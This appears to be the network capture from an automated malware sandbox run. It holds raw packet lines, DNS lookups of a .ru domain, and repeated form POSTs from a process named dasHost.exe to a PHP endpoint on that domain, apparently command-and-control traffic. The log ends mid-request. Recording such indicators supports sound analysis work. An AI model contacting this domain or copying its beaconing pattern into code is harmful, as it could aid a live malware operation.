                                                                        Dec 28, 2024 20:44:30.745414019 CET8049987104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:44:30.834297895 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:44:30.837569952 CET4973480192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:44:30.954812050 CET4998780192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:44:30.957108974 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:44:31.074393034 CET8049987104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:44:31.074426889 CET8049987104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:44:31.074487925 CET8049987104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:44:31.170332909 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:44:31.170476913 CET4973480192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:44:31.290098906 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:44:31.290111065 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:44:31.697618961 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:44:31.698669910 CET4973480192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:44:31.784794092 CET8049987104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:44:31.818134069 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:44:31.907337904 CET4998780192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:44:32.031336069 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:44:32.031521082 CET4973480192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:44:32.037031889 CET8049987104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:44:32.111882925 CET4998780192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:44:32.151019096 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:44:32.151156902 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:44:32.199748039 CET4999180192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:44:32.199748993 CET4998780192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:44:32.319322109 CET8049991104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:44:32.319408894 CET4999180192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:44:32.319562912 CET4999180192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:44:32.319731951 CET8049987104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:44:32.322644949 CET4998780192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:44:32.443028927 CET8049991104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:44:32.566811085 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:44:32.570915937 CET4973480192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:44:32.674146891 CET4999180192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:44:32.690459013 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:44:32.793737888 CET8049991104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:44:32.793752909 CET8049991104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:44:32.793776035 CET8049991104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:44:32.903656006 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:44:32.906251907 CET4973480192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:44:33.026032925 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:44:33.026102066 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:44:33.435112953 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:44:33.436186075 CET4973480192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:44:33.489902020 CET8049991104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:44:33.704258919 CET4999180192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:44:33.782475948 CET4973480192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:44:33.813616991 CET4973480192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:44:34.015142918 CET8049991104.21.38.84192.168.2.4
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Dec 28, 2024 20:42:30.411755085 CET | 62493 | 53 | 192.168.2.4 | 1.1.1.1
Dec 28, 2024 20:42:30.779380083 CET | 53 | 62493 | 1.1.1.1 | 192.168.2.4
Dec 28, 2024 20:42:48.014177084 CET | 56916 | 53 | 192.168.2.4 | 1.1.1.1
Dec 28, 2024 20:42:48.151943922 CET | 53 | 56916 | 1.1.1.1 | 192.168.2.4
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Dec 28, 2024 20:42:30.411755085 CET | 192.168.2.4 | 1.1.1.1 | 0x8f33 | Standard query (0) | 048038cm.renyash.ru | A (IP address) | IN (0x0001) | false
Dec 28, 2024 20:42:48.014177084 CET | 192.168.2.4 | 1.1.1.1 | 0xa3d5 | Standard query (0) | 048038cm.renyash.ru | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Dec 28, 2024 20:42:30.779380083 CET | 1.1.1.1 | 192.168.2.4 | 0x8f33 | No error (0) | 048038cm.renyash.ru |  | 104.21.38.84 | A (IP address) | IN (0x0001) | false
Dec 28, 2024 20:42:30.779380083 CET | 1.1.1.1 | 192.168.2.4 | 0x8f33 | No error (0) | 048038cm.renyash.ru |  | 172.67.220.198 | A (IP address) | IN (0x0001) | false
Dec 28, 2024 20:42:48.151943922 CET | 1.1.1.1 | 192.168.2.4 | 0xa3d5 | No error (0) | 048038cm.renyash.ru |  | 104.21.38.84 | A (IP address) | IN (0x0001) | false
Dec 28, 2024 20:42:48.151943922 CET | 1.1.1.1 | 192.168.2.4 | 0xa3d5 | No error (0) | 048038cm.renyash.ru |  | 172.67.220.198 | A (IP address) | IN (0x0001) | false
                                                                        • 048038cm.renyash.ru
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.4 | 49734 | 104.21.38.84 | 80 | 8628 | C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe
Timestamp | Bytes transferred | Direction | Data
Dec 28, 2024 20:42:30.927011013 CET | 329 | OUT | POST /pipepacketprocessGeneratordownloads.php HTTP/1.1
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                        Host: 048038cm.renyash.ru
                                                                        Content-Length: 344
                                                                        Expect: 100-continue
                                                                        Connection: Keep-Alive
Dec 28, 2024 20:42:32.156630039 CET | 25 | IN | HTTP/1.1 100 Continue
Dec 28, 2024 20:42:32.399333000 CET | 1236 | IN | HTTP/1.1 200 OK
                                                                        Date: Sat, 28 Dec 2024 19:42:32 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: keep-alive
                                                                        cf-cache-status: DYNAMIC
                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2Z%2BC9rMS1ebzyY9L%2B6ZexTbibDNeYD2Epuu35yhpEQLD01%2FDkcNxp%2Fk7YlvuqyvNz11qTawauN9rgWGUFPTnR7SrHeCYfcs1qRFQscUGpRkQWvhMJMpa9ZP5IMdDQzC9UMas4%2FBQ"}],"group":"cf-nel","max_age":604800}
                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                        Server: cloudflare
                                                                        CF-RAY: 8f9408b9fc7c42cc-EWR
                                                                        alt-svc: h3=":443"; ma=86400
                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=3534&min_rtt=1756&rtt_var=4215&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=673&delivery_rate=91347&cwnd=168&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
Dec 28, 2024 20:42:32.466384888 CET | 305 | OUT | POST /pipepacketprocessGeneratordownloads.php HTTP/1.1
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                        Host: 048038cm.renyash.ru
                                                                        Content-Length: 384
                                                                        Expect: 100-continue
Dec 28, 2024 20:42:32.798706055 CET | 25 | IN | HTTP/1.1 100 Continue
Dec 28, 2024 20:42:33.291346073 CET | 957 | IN | HTTP/1.1 200 OK
                                                                        Date: Sat, 28 Dec 2024 19:42:33 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: keep-alive
                                                                        cf-cache-status: DYNAMIC
                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=vlqQMUDrn32J4G6%2FG5UAmZpoQqcYDnmH1v1upC0EMeVvUO8BM6JhWEEvXjIMPIzDKUV2mNnV3O0NTYsf%2FE2z3uBZk6mKe240D3HJ99Uy3CpYuTfbWbft869eXxaMOwzngM8U1%2BkH"}],"group":"cf-nel","max_age":604800}
                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                        Server: cloudflare
                                                                        CF-RAY: 8f9408bdf8a242cc-EWR
                                                                        alt-svc: h3=":443"; ma=86400
                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=4693&min_rtt=1753&rtt_var=5452&sent=7&recv=9&lost=0&retrans=0&sent_bytes=2219&recv_bytes=1362&delivery_rate=2445561&cwnd=172&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
Dec 28, 2024 20:42:33.503240108 CET 306 OUT POST /pipepacketprocessGeneratordownloads.php HTTP/1.1
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                        Host: 048038cm.renyash.ru
                                                                        Content-Length: 1888
                                                                        Expect: 100-continue
Dec 28, 2024 20:42:33.883322954 CET 25 IN HTTP/1.1 100 Continue
Dec 28, 2024 20:42:34.407548904 CET 957 IN HTTP/1.1 200 OK
                                                                        Date: Sat, 28 Dec 2024 19:42:34 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: keep-alive
                                                                        cf-cache-status: DYNAMIC
                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=qcn8QlmH0ZhaIeRO%2Bby%2BnXBLlqIrurw9Wl3assyv6h3Fm3KZWx27EYb8p8HcyEjK9JbXmAYclephUiy03%2FRUTeaj8F19zIFHM9mG8CXuV%2BDSyJPNjbbvbdA8Qbobz1A0N5tMcQbk"}],"group":"cf-nel","max_age":604800}
                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                        Server: cloudflare
                                                                        CF-RAY: 8f9408c4a87e42cc-EWR
                                                                        alt-svc: h3=":443"; ma=86400
                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=9586&min_rtt=1714&rtt_var=14109&sent=13&recv=15&lost=0&retrans=0&sent_bytes=3201&recv_bytes=3556&delivery_rate=2445561&cwnd=175&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
Dec 28, 2024 20:42:34.617825031 CET 5 IN Data Raw: 30 0d 0a 0d 0a
                                                                        Data Ascii: 0
Dec 28, 2024 20:42:34.620933056 CET 306 OUT POST /pipepacketprocessGeneratordownloads.php HTTP/1.1
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                        Host: 048038cm.renyash.ru
                                                                        Content-Length: 2100
                                                                        Expect: 100-continue
Dec 28, 2024 20:42:34.953150988 CET 25 IN HTTP/1.1 100 Continue
Dec 28, 2024 20:42:35.485136032 CET 964 IN HTTP/1.1 200 OK
                                                                        Date: Sat, 28 Dec 2024 19:42:35 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: keep-alive
                                                                        cf-cache-status: DYNAMIC
                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=VBMhI13Aq5EOoW860J2hfeNg%2F%2FYbhTCtBxSlVxjdiM6Y5pK3859Ei6D6C1RWk1FunqjP6VUMVWn4Ha3%2BrHpDMBYAsR56XLNJc%2FgP58zkO61Cp14eTc3ECguhPb%2BBNzg8KBNHZFrc"}],"group":"cf-nel","max_age":604800}
                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                        Server: cloudflare
                                                                        CF-RAY: 8f9408cb78ea42cc-EWR
                                                                        alt-svc: h3=":443"; ma=86400
                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=9555&min_rtt=1714&rtt_var=11217&sent=19&recv=20&lost=0&retrans=0&sent_bytes=4188&recv_bytes=5962&delivery_rate=2445561&cwnd=175&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
Dec 28, 2024 20:42:35.488133907 CET 306 OUT POST /pipepacketprocessGeneratordownloads.php HTTP/1.1
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                        Host: 048038cm.renyash.ru
                                                                        Content-Length: 2100
                                                                        Expect: 100-continue
Dec 28, 2024 20:42:35.821675062 CET 25 IN HTTP/1.1 100 Continue
Dec 28, 2024 20:42:36.352484941 CET 963 IN HTTP/1.1 200 OK
                                                                        Date: Sat, 28 Dec 2024 19:42:36 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: keep-alive
                                                                        cf-cache-status: DYNAMIC
                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=MbyZx%2BVkvR6f%2BzWULjCamC39HmPgrzYCdlJo5Wg3vY6Rk%2BH6nlsNRGkixCAWJCtRavr7WLxXQgSgTVUHZJYn2%2FwFVQirnSKnD2igNBfQJL4qyUi8QCoLMV6La8Y6K1nZYF6bDpnA"}],"group":"cf-nel","max_age":604800}
                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                        Server: cloudflare
                                                                        CF-RAY: 8f9408d0ef2c42cc-EWR
                                                                        alt-svc: h3=":443"; ma=86400
                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=10383&min_rtt=1714&rtt_var=11150&sent=25&recv=25&lost=0&retrans=0&sent_bytes=5177&recv_bytes=8368&delivery_rate=2445561&cwnd=175&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
Dec 28, 2024 20:42:36.358977079 CET 306 OUT POST /pipepacketprocessGeneratordownloads.php HTTP/1.1
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                        Host: 048038cm.renyash.ru
                                                                        Content-Length: 2100
                                                                        Expect: 100-continue
Dec 28, 2024 20:42:36.692096949 CET 25 IN HTTP/1.1 100 Continue
Dec 28, 2024 20:42:37.219238043 CET 964 IN HTTP/1.1 200 OK
                                                                        Date: Sat, 28 Dec 2024 19:42:37 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: keep-alive
                                                                        cf-cache-status: DYNAMIC
                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Fa1kgRuJdQCTqpH5uzAstwsChp%2FWtzgPXC0SlQPK%2BUfIwJ6bH2ISlVsFHOLiBss8lA0EvzQjlZEb8%2FZx6YPTrFVV6F4uELfMn3HPuxF7mz%2BJyxhDi5cWxU9crSEII%2FD5iZ9OuUON"}],"group":"cf-nel","max_age":604800}
                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                        Server: cloudflare
                                                                        CF-RAY: 8f9408d65d6342cc-EWR
                                                                        alt-svc: h3=":443"; ma=86400
                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=9608&min_rtt=1714&rtt_var=8453&sent=31&recv=30&lost=0&retrans=0&sent_bytes=6165&recv_bytes=10774&delivery_rate=2445561&cwnd=175&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
Dec 28, 2024 20:42:37.226074934 CET 306 OUT POST /pipepacketprocessGeneratordownloads.php HTTP/1.1
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                        Host: 048038cm.renyash.ru
                                                                        Content-Length: 2100
                                                                        Expect: 100-continue
Dec 28, 2024 20:42:37.715698004 CET 25 IN HTTP/1.1 100 Continue
Dec 28, 2024 20:42:37.930838108 CET 25 IN HTTP/1.1 100 Continue
Dec 28, 2024 20:42:38.135669947 CET 964 IN HTTP/1.1 200 OK
                                                                        Date: Sat, 28 Dec 2024 19:42:37 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: keep-alive
                                                                        cf-cache-status: DYNAMIC
                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=C3gVxZ3sGdTq0%2BfBWdpPO%2FcHiXBgTLmD81qq%2Ft8qt0Bi%2BORqwpeM1dd2qrs1bN1hRAAAVsmck%2BxUGu9DYpc8H4oKmsZdJv6xP08H0u%2Fu%2FjGXw1adxqgOjDQHVA7OGFuuzckgibRU"}],"group":"cf-nel","max_age":604800}
                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                        Server: cloudflare
                                                                        CF-RAY: 8f9408dbbbbe42cc-EWR
                                                                        alt-svc: h3=":443"; ma=86400
                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=10111&min_rtt=1714&rtt_var=9181&sent=37&recv=35&lost=0&retrans=0&sent_bytes=7154&recv_bytes=13180&delivery_rate=2445561&cwnd=175&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
Dec 28, 2024 20:42:38.345896006 CET 5 IN Data Raw: 30 0d 0a 0d 0a
                                                                        Data Ascii: 0
Dec 28, 2024 20:42:38.347070932 CET 306 OUT POST /pipepacketprocessGeneratordownloads.php HTTP/1.1
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                        Host: 048038cm.renyash.ru
                                                                        Content-Length: 2100
                                                                        Expect: 100-continue
Dec 28, 2024 20:42:38.679655075 CET 25 IN HTTP/1.1 100 Continue
Dec 28, 2024 20:42:39.204943895 CET 964 IN HTTP/1.1 200 OK
                                                                        Date: Sat, 28 Dec 2024 19:42:39 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: keep-alive
                                                                        cf-cache-status: DYNAMIC
                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=IVsP2hDmLlujLDolIArUABQAwGqW1UezPdY0vWN93nb%2FnTELU72R374XzhZN%2BMpXH%2FWezf8Jt59ZEz8JWzHOAH3w%2BNO53RpqmxF2bPEsbGEGlTyJapc567mpgE0N065rXc7c9P0Y"}],"group":"cf-nel","max_age":604800}
                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                        Server: cloudflare
                                                                        CF-RAY: 8f9408e2bc2b42cc-EWR
                                                                        alt-svc: h3=":443"; ma=86400
                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=10986&min_rtt=1714&rtt_var=10524&sent=43&recv=40&lost=0&retrans=0&sent_bytes=8148&recv_bytes=15586&delivery_rate=2445561&cwnd=175&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
Dec 28, 2024 20:42:39.205889940 CET 306 OUT POST /pipepacketprocessGeneratordownloads.php HTTP/1.1
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                        Host: 048038cm.renyash.ru
                                                                        Content-Length: 2076
                                                                        Expect: 100-continue
Dec 28, 2024 20:42:39.538486004 CET 25 IN HTTP/1.1 100 Continue
Dec 28, 2024 20:42:40.063571930 CET 964 IN HTTP/1.1 200 OK
                                                                        Date: Sat, 28 Dec 2024 19:42:39 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: keep-alive
                                                                        cf-cache-status: DYNAMIC
                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=KmS0O52uV3DELwBUJMgx%2FuU08ozCcRqEArg6VJFslxfzyQYYzvRamD8%2F9V%2FtooYYw8e8ZVtFpam0xGhwQAi7b9EbR098KiA21zdLKBwBZaWFrkYvLiuWhY4crPjBUfTzoC%2BDEB3S"}],"group":"cf-nel","max_age":604800}
                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                        Server: cloudflare
                                                                        CF-RAY: 8f9408e81a8842cc-EWR
                                                                        alt-svc: h3=":443"; ma=86400
                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=11714&min_rtt=1714&rtt_var=11381&sent=49&recv=45&lost=0&retrans=0&sent_bytes=9137&recv_bytes=17968&delivery_rate=2445561&cwnd=175&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
Dec 28, 2024 20:42:40.070907116 CET 306 OUT POST /pipepacketprocessGeneratordownloads.php HTTP/1.1
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                        Host: 048038cm.renyash.ru
                                                                        Content-Length: 2100
                                                                        Expect: 100-continue
Dec 28, 2024 20:42:40.403213978 CET 25 IN HTTP/1.1 100 Continue
Dec 28, 2024 20:42:40.938472986 CET 969 IN HTTP/1.1 200 OK
                                                                        Date: Sat, 28 Dec 2024 19:42:40 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: keep-alive
                                                                        cf-cache-status: DYNAMIC
                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Qbfp%2FcBZUe08w3XiHqyzpey5ogG4F9AW21ctM2bFdo%2Byu7Zepd0Sh2NLFG1WHvgW3gsVkV3%2FX2I6OBMi%2FW87AQDvr%2B%2FgfIHqJVZQZ0IObQ4UzzfgZ459Od4MKGjkTBmQl3XFiItf"}],"group":"cf-nel","max_age":604800}
                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                        Server: cloudflare
                                                                        CF-RAY: 8f9408ed894c42cc-EWR
                                                                        alt-svc: h3=":443"; ma=86400
                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=11578&min_rtt=1714&rtt_var=10464&sent=55&recv=50&lost=0&retrans=0&sent_bytes=10126&recv_bytes=20374&delivery_rate=2445561&cwnd=175&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                        Dec 28, 2024 20:42:40.950210094 CET 306 OUT POST /pipepacketprocessGeneratordownloads.php HTTP/1.1
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                        Host: 048038cm.renyash.ru
                                                                        Content-Length: 2100
                                                                        Expect: 100-continue
                                                                        Dec 28, 2024 20:42:41.282687902 CET 25 IN HTTP/1.1 100 Continue
                                                                        Dec 28, 2024 20:42:41.812064886 CET 966 IN HTTP/1.1 200 OK
                                                                        Date: Sat, 28 Dec 2024 19:42:41 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: keep-alive
                                                                        cf-cache-status: DYNAMIC
                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=PvHSGmPDbA%2FO%2FCDG66bMeWMY5ZAn0iX0%2BxkV7mKIp25qNo8PnodXDTebxUp5%2B6rCIjsOkocuASMo7X4OBqEp0eZ8fQPgsPD%2BNQnXiK58WSVwKtuK7j5vMMoNTTSLX1rI8yB6Wrhg"}],"group":"cf-nel","max_age":604800}
                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                        Server: cloudflare
                                                                        CF-RAY: 8f9408f3080642cc-EWR
                                                                        alt-svc: h3=":443"; ma=86400
                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=10949&min_rtt=1714&rtt_var=8913&sent=61&recv=55&lost=0&retrans=0&sent_bytes=11120&recv_bytes=22780&delivery_rate=2445561&cwnd=175&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                        Dec 28, 2024 20:42:41.813085079 CET 306 OUT POST /pipepacketprocessGeneratordownloads.php HTTP/1.1
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                        Host: 048038cm.renyash.ru
                                                                        Content-Length: 2100
                                                                        Expect: 100-continue
                                                                        Dec 28, 2024 20:42:42.145750046 CET 25 IN HTTP/1.1 100 Continue
                                                                        Dec 28, 2024 20:42:42.680454969 CET 961 IN HTTP/1.1 200 OK
                                                                        Date: Sat, 28 Dec 2024 19:42:42 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: keep-alive
                                                                        cf-cache-status: DYNAMIC
                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=y517bgNr5r%2FEqiOTW%2B4NYJY03NASBzQGOh2evgvxPvXOxuNQoVP96ChH1Iz9LzBB0Xkw5duyslDSvMHnz0fTjauvenX4GxcDoPHlgs2kEoK5Y2BNICaKoygoWIpfdnoAHgyMse67"}],"group":"cf-nel","max_age":604800}
                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                        Server: cloudflare
                                                                        CF-RAY: 8f9408f86e8c42cc-EWR
                                                                        alt-svc: h3=":443"; ma=86400
                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=11934&min_rtt=1714&rtt_var=10940&sent=67&recv=60&lost=0&retrans=0&sent_bytes=12111&recv_bytes=25186&delivery_rate=2445561&cwnd=175&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                        Dec 28, 2024 20:42:42.688981056 CET 306 OUT POST /pipepacketprocessGeneratordownloads.php HTTP/1.1
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                        Host: 048038cm.renyash.ru
                                                                        Content-Length: 2100
                                                                        Expect: 100-continue
                                                                        Dec 28, 2024 20:42:43.021095037 CET 25 IN HTTP/1.1 100 Continue
                                                                        Dec 28, 2024 20:42:43.512480021 CET 959 IN HTTP/1.1 200 OK
                                                                        Date: Sat, 28 Dec 2024 19:42:43 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: keep-alive
                                                                        cf-cache-status: DYNAMIC
                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=MiKylsjq5%2FeJ69EC1PfkCWQfONYFARs4O2AA59SpJOBsuStslxCG8YbG2rQLAmx6yeCfdvpeBH4KKdSfxhJXYzbN6CZG2ZyoRxDouSx2EJEDpXRmqe2rQ6MKQeK6JoZGqd6Rvnw2"}],"group":"cf-nel","max_age":604800}
                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                        Server: cloudflare
                                                                        CF-RAY: 8f9408fded0942cc-EWR
                                                                        alt-svc: h3=":443"; ma=86400
                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=14577&min_rtt=1714&rtt_var=15872&sent=72&recv=65&lost=0&retrans=0&sent_bytes=13097&recv_bytes=27592&delivery_rate=2445561&cwnd=175&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                        Dec 28, 2024 20:42:43.515008926 CET 306 OUT POST /pipepacketprocessGeneratordownloads.php HTTP/1.1
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
